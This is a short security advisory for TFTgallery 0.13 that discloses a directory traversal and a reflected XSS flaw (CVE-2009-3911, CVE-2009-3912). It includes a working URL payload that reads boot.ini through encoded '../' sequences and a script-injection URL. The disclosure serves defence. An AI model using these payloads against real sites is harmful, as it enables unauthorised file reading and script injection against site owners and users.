TFTgallery 0.13 directory traversal vulnerability

2009-11-03 / 2009-11-04

Credit: none

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-3911 | CVE-2009-3912

CWE: CWE-79
CWE-22

Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:
The album parameter is vulnerable to directory transversal
http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1<http://192.168.1.130/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1>
The sample parameter is vulnerable to XSS
http://example.com/tftgallery/settings.php?sample='></link><script>alert('blake
XSS test')</script>&name=cucumber%20cool
<http://192.168.1.130/tftgallery/settings.php?sample=>

References:

http://www.securityfocus.com/bid/36899

http://secunia.com/advisories/37156

http://packetstormsecurity.org/0911-exploits/tftgallery-traversal.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

TFTgallery 0.13 directory traversal vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.